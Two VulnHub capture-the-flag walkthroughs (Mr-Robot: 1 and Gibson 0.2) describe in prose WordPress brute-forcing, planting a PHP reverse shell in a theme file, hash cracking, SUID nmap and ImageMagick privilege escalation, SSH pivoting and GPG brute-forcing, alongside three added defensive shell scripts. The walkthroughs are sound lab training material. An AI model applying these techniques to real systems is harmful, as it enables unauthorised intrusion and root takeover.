Overall this VM was a lot of fun. It had a little bit of something for everyone and plenty of clues built in that had me running in all directions. I hope this guide is useful for anyone starting out. Due to the length of the post I kept some of the explanations brief; a screenshot speaks a thousand words (sometimes). If you have questions on anything leave a comment or hit me up on Twitter or Freenode in #vulnhub or #offsec.

Thanks to g0tmi1k for putting this together and, as always, for maintaining vulnhub, which serves as a great educational tool for many.

Mr-Robot: 1 walkthrough

Download location: https://download.vulnhub.com/mrrobot/mrRobot.ova

Goal: Find 3 keys hidden in different locations

The VM loaded up without an issue and grabbed an IP from DHCP.

I started off with a quick nmap scan, which showed both port 80 and 443 open.

Browsing to both I was greeted with an interactive page which seems to be a clone of https://www.whoismrrobot.com. Really cool added effects.

I went through each of the prompts to make sure there was no command injection before firing up Burp and browsing around/spidering.

The robots.txt file presented me with a dictionary file (perhaps alluding to some sort of brute-forcing) as well as a key file containing an MD5 hash.

I saved both files down locally and my initial thoughts were confirmed, a custom dictionary file with over 850K lines.

I also had the first of the 3 keys mentioned in the readme. 1 down, 2 to go!

Some more poking around with Burp and I came across a WordPress login page. Since SSH was not enabled this seemed to be a good candidate for brute forcing.

When the default 'admin' username came back as invalid, I was able to guess the user thanks to WordPress' convenient built-in username enumeration.

Below is the result for 'admin' as the username, showing "ERROR: Invalid username":

Conversely, when I tried 'elliot' I was greeted with "ERROR: The password you entered for the username Elliot is incorrect". Awesome, half way there!

I decided to run WPScan to both search for any WordPress misconfigurations and/or vulnerable plugins as well for its brute forcing function. I kicked off the scan with the username 'elliot' and the 'fsocity.dic' dictionary as the wordlist. While that ran, I kept poking around the site.

I didn't find much else, aside from some trolls hanging around. Several references to the show.

A few hours later (3 hours 30 minutes 48 seconds to be exact)... I was presented with a positive result which I am glad I did not wait around for.

In retrospect, had I looked at the dictionary file more closely (doh) I would have noticed it is mostly duplicates (nice troll Jason!). Sorting and removing the duplicates leaves us with a very few entries.

The password was Elliot's employee ID number from the show. Once logged in I poked around the admin console for a bit and did not turn up anything of note.

A quick win when you have direct access to a WordPress admin console is to replace one of the theme templates with some PHP of your own. I decided to try for a reverse shell by editing the 404.php theme and replacing the contents with the PHP reverse shell from Pentest Monkey.

Browsing to http://192.168.110.153/wp-content/themes/twentytwelve/404.php gave me a hit on my listener. And we're in!

Checking around the file system a bit I could see there was another user named 'robot'. This user's home directory held the second key file which I could not read...yet.

I was also presented with the MD5 of the user's password, which I could read.

I threw the MD5 into John and got a quick result.

Using this password I was able to su to the user 'robot' and from here I was able to read the second key file.

2 down! 1 to go.

Digging around the file system as 'robot' I could see an FTP client running on localhost which could possibly be leveraged as another route. However, I focused my attention on an old version of nmap owned by root with the SUID bit set. Using the "--interactive" switch I was able to run commands as root.

Using this method I was able to grab the third key file.

I first attempted to throw myself a reverse shell with netcat however even though I could run commands as root the reverse shell still connected back in the context of the user 'robot'.

I went for broke and added the user 'robot' to the sudoers.

Now that worked!

Now I was root and dug around a bit to see what was going on with the nmap interactive shell.
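The root-owned SUID nmap above is the kind of thing a periodic setuid audit is meant to catch. The script below is an added example (not from the write-up): it lists setuid files and reports the ones missing from an expected baseline. The demo directory, its three fake binaries and the baseline list are constructed; on a real host you would run the find against / and keep the baseline from a known-good build.

```shell
#!/bin/sh
# Added example: list setuid binaries and report any that are not on an
# expected baseline. The demo directory and baseline are constructed.

# Print every regular file under $1 with the setuid bit set, sorted.
find_setuid() {
    find "$1" -type f -perm -4000 | sort
}

# Print setuid files under $1 that do not appear (as exact lines) in the
# baseline file $2. grep exits 1 when nothing is unexpected, which is fine.
unexpected_setuid() {
    find_setuid "$1" | grep -vxF -f "$2" || true
}

# Constructed demo: a directory standing in for /usr/local/bin on the VM.
make_demo_bin_dir() {
    demo=$(mktemp -d)
    for name in ping passwd nmap; do
        printf '#!/bin/sh\necho %s\n' "$name" > "$demo/$name"
        chmod 755 "$demo/$name"
    done
    chmod u+s "$demo/ping" "$demo/passwd"   # expected setuid binaries
    chmod u+s "$demo/nmap"                  # the unexpected one
    printf '%s/ping\n%s/passwd\n' "$demo" "$demo" > "$demo/baseline.txt"
    printf '%s\n' "$demo"
}

# Stand-alone run: print what the baseline does not account for.
demo=$(make_demo_bin_dir)
echo "setuid files not in baseline:"
unexpected_setuid "$demo" "$demo/baseline.txt"
rm -rf "$demo"
```

A baseline diff is more useful than a raw list because a normal install has a dozen or more legitimate setuid programs (passwd, su, ping and so on); what you want to see is only the entry that was not there yesterday.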

This was a fun VM and a welcome break from other things. Thanks to the author, Jason, for putting it together and as always thanks to g0tmi1k and the #vulnhub team for hosting and keeping this awesome community going. Looking forward to the next one!

Key locations:

Key #   Location                  MD5
1       Web root                  073403c8a58a1f80d943455fb30724b9
2       Robot's home directory    822c73956184f694993bede3eb39f959
3       Root's home directory     04787ddef27c3dee1ee161b21670b4e4

Gibson 0.2 vulnhub write-up

I first discovered Vulnhub nearly 2 years ago when I was looking for a career change. In this time I have been through nearly every VM and if it was over my head I have gone through the walkthroughs step-by-step. The work this community does has been instrumental in my learning, preparation for the OSCP and ultimately a career shift from IT audit into application and network penetration testing. I took on the latest VM both to see how far I've come and to provide something (hopefully) useful to others fighting tooth and nail to catch-up and get ahead in this industry.

Shout out to @knightmare2600 for creating this challenge, @g0tmi1k for hosting the challenge on @vulnhub and @sizzop for being a great mentor and tearing up my first write-up.

I understand that there are quicker ways to complete this challenge, what follows is the "long route".

I started off with a quick nmap scan which only turned up ports 22 and 80.

Browsing to port 80 I was greeted with a directory listing and davinci.html page (first of many references to Hackers). The message here will be important much later on. I fired up Dirbuster and let it run for a while but didnā€™t uncover anything useful.

Continued poking around and took a look at the page source of davinci.html. The comment contained SSH credentials. I doubted that they'd work and knew that, if they did, I would still be a long way from my goal.

I successfully SSHd in as Margo and started poking around.

Nothing of note in /var/www/html

Walking through various privilege escalation techniques that served me well in the OSCP labs, 'sudo -l' gave me an interesting result. Margo could run /usr/bin/convert as root, which, if you've been paying attention, meant that this box was likely vulnerable to the recent ImageMagick RCE vulnerability in the image decoder. (More info here: https://imagetragick.com/)

A quick test with a 1-liner POC showed that I could run commands as root:
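On the mitigation side, the ImageTragick advisory's recommended fix for hosts that cannot patch is a policy.xml that disables the coders involved. The script below, added here as an example and not part of the write-up, checks a policy file for those restrictions and shows a weak policy next to a hardened one. Both policy files are constructed; the check assumes the attributes are written in the order domain, rights, pattern, as in the published mitigation, and on a real host the file usually lives under /etc/ImageMagick*/policy.xml.

```shell
#!/bin/sh
# Added example: check an ImageMagick policy.xml for the coder restrictions
# that mitigate the ImageTragick command-injection bug. The two policy files
# below are constructed.

# Coders that the ImageTragick advisory recommends disabling.
RISKY_CODERS="EPHEMERAL URL HTTPS MVG MSL"

# Print, one per line, the risky coders that $1 does not set to rights="none".
missing_coder_policies() {
    for coder in $RISKY_CODERS; do
        if ! grep -q "domain=\"coder\"[^>]*rights=\"none\"[^>]*pattern=\"$coder\"" "$1"; then
            echo "$coder"
        fi
    done
}

# Constructed weak policy: only a resource limit, no coder restrictions.
write_weak_policy() {
    cat > "$1" <<'EOF'
<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
</policymap>
EOF
}

# Constructed hardened policy with the five recommended coder restrictions.
write_hardened_policy() {
    cat > "$1" <<'EOF'
<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="MSL" />
</policymap>
EOF
}

# Stand-alone run: show what each policy leaves open.
tmp=$(mktemp -d)
write_weak_policy "$tmp/weak.xml"; write_hardened_policy "$tmp/hardened.xml"
echo "weak policy leaves enabled:"; missing_coder_policies "$tmp/weak.xml"
echo "hardened policy leaves enabled: $(missing_coder_policies "$tmp/hardened.xml" | wc -l | tr -d ' ')"
rm -rf "$tmp"
```

The policy limits the blast radius of the parser bug, but the sudo rule is the real problem here: letting a user run convert as root turns any ImageMagick bug, present or future, into a root shell, so the durable fix is removing that rule rather than hardening the binary it points at.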

I decided to crack the other user passwords to see what else I would have access to. In retrospect this was not necessary and I could have gone directly for root and moved on, however I did not want to leave one stone unturned.

I fired up John with rockyou.txt and had both users' passwords in seconds.

Again, I could have utilized the ImageMagick vulnerability to edit the sudoers file with vi but decided to dig around the file system as Eugene and ultimately used visudo to add an entry to the sudoers file and su to root.

A quick check to make sure I had root.

Based on the hints I knew that I was far from done and likely would not find the flag directly on this box. The set up instructions alluded to other subnets in play and possible X11 SSH port forwarding.

Netstat showed me a DNS server running at 192.168.122.1 and port 5900 (VNC) listening locally. VNC did not show up in the initial nmap scan, I checked again to make sure. The first thought was that this host was NATd to the 192.168.122.0/24 network.

Ifconfig confirmed this, NATd via the virbr0 interface.

I set up a dynamic port-forwarding rule on my host to check.

Added an entry to the /etc/proxychains.conf file and was off to the races.

Once this port-forwarding rule was established I was able to connect via vncviewer.
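The proxychains entry mentioned above is a single line, but it is easy to get wrong (wrong proxy type, wrong port, placed above the [ProxyList] header). The script below is an added example, not the write-up's own configuration: it writes a minimal proxychains.conf pointing at a local SOCKS5 port and validates the entry. The SOCKS port 1080, the margo@<gibson-ip> login and the <target> are placeholders.

```shell
#!/bin/sh
# Added example: build and validate the proxychains configuration that sends
# a local tool through an SSH dynamic (SOCKS) forward. Port 1080 and the
# host names in the comments are placeholders.

# Write a minimal proxychains.conf to $1 pointing at a local SOCKS5 port $2.
write_proxychains_conf() {
    cat > "$1" <<EOF
# strict_chain: use the single proxy below; proxy_dns: resolve names
# through the tunnel so lookups do not leak from the local machine.
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks5 127.0.0.1 $2
EOF
}

# Print the proxy entries found after [ProxyList] in the config file $1.
proxy_entries() {
    awk '/^\[ProxyList\]/ { inlist = 1; next } inlist && NF { print }' "$1"
}

# Validate that $1 has exactly one socks5 entry on 127.0.0.1 with a port
# between 1 and 65535; prints "ok" or "bad".
check_proxychains_conf() {
    entries=$(proxy_entries "$1")
    count=$(printf '%s\n' "$entries" | grep -c '^socks5 127\.0\.0\.1 [0-9][0-9]*$' || true)
    port=$(printf '%s\n' "$entries" | awk '$1 == "socks5" { print $3; exit }')
    if [ "$count" = "1" ] && [ "${port:-0}" -ge 1 ] && [ "${port:-0}" -le 65535 ]; then
        echo ok
    else
        echo bad
    fi
}

# Stand-alone run. With the file copied to /etc/proxychains.conf (as in the
# write-up) the tunnel and client would be:
#   ssh -f -N -D 127.0.0.1:1080 margo@<gibson-ip>   # SOCKS listener on 1080
#   proxychains vncviewer <target>:5900
conf=$(mktemp)
write_proxychains_conf "$conf" 1080
proxy_entries "$conf"
check_proxychains_conf "$conf"
rm -f "$conf"
```

Binding the SOCKS listener to 127.0.0.1 rather than all interfaces matters on a shared machine: an `ssh -D` bound to 0.0.0.0 hands anyone on your network a ready-made pivot into the target's subnet.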

I was presented with an apparent FTP server running on FreeDOS 1.1. Some poking around showed that the FTP server was not set up and that netcat and telnet were present. I found what I needed in the c:\GARBAGE directory. I was able to transfer the smaller files over via netcat but had to go ahead and configure the FTP server to transfer the .img file.

I followed this guide to configure the FTP http://freedos.sourceforge.net/wiki/index.php/VirtualBox_-_Chapter_6. I'm not sure if it was just my keyboard or an issue with the FreeDOS set up but the \ key did not work so I had to create the FTP configuration locally.

I uploaded it to the box via netcat.

Once this was done I was able to FTP in but there was one more step, adding Margo to the ftppass.txt file

I was able to edit the ftppass.txt file directly on the remote host.

Once this was done I was able to log in and grab the .img file.

The remainder could be done with forensics tools but I went a different route. I mounted the .img file in /tmp.

The hint file got me closer to the goal. Jonny Lee Miller was in both Hackers and Trainspotting. In 1988 his handle was zerocool. Closer still, but Knightmare wasnā€™t going to give up the flag that easily.

I poked around at the other files and directories. Snake game written in C. I checked the source for something hidden (just in case) and a jpg from Trainspotting which I checked for exiftool for anything hidden.

The prize was waiting for me in the .trash directory. This next part stumped me for quite some time. The hint from the davinci.html page mentioned brute force so it was clear that we'd have to brute force the passphrase for the flag.txt.gpg file.

I put together a rudimentary script to attempt all of the variations of 'zerocool' that I could come up with in a .txt file. No luck at first. I ended up receiving a hint from Knightmare that I would need to generate a more extensive wordlist, applying l33tspeak rules to it. I have not done too much password cracking or working with wordlist rules so I followed this post: https://www.vankuik.nl/2011-08-30_Creating_specific_password_lists_with_John_the_Ripper. The rules here did not generate the most efficient wordlist and I had to leave the bruteforce running for quite some time. In retrospect the Corelogic rules worked much faster.

After generating the massive wordlist I tried again.

My bash script for brute forcing the passphrase.

The script ran for a long, long, time and eventually coughed up the flag.txt file I was after. It could be improved upon to print out the correct passphrase.